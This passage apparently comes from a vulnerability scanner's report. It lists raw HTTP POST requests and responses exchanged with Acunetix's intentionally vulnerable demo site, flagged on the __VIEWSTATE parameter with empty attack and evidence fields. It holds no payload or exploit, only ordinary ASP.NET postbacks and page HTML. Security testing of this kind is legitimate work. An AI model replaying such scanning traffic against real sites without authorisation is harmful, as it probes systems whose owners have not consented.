to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1163 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,163 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8552&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBAmiQzYtsIZGRkxLM5IYScFYGHqwtDSa17lcheCXs%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLMvr%2FpAgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMnHf2lwi5lck6ExoHfMMxP9qAoI4%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:05:07 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBAmiQzYtsIZGRkxLM5IYScFYGHqwtDSa17lcheCXs=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLMvr/pAgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMnHf2lwi5lck6ExoHfMMxP9qAoI4=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:White" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1167 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,167 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8556&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBAQc5XZdsIZGRkQbCHpLJEBUgJhIzb%2Fd%2FCUBLQ1tM%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLwzpjuCAK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMdcyOl0xwwWbaQAJaX7EKHuc%2F69E%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:16:46 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBAQc5XZdsIZGRkQbCHpLJEBUgJhIzb/d/CUBLQ1tM=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLwzpjuCAK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMdcyOl0xwwWbaQAJaX7EKHuc/69E=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:White" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div 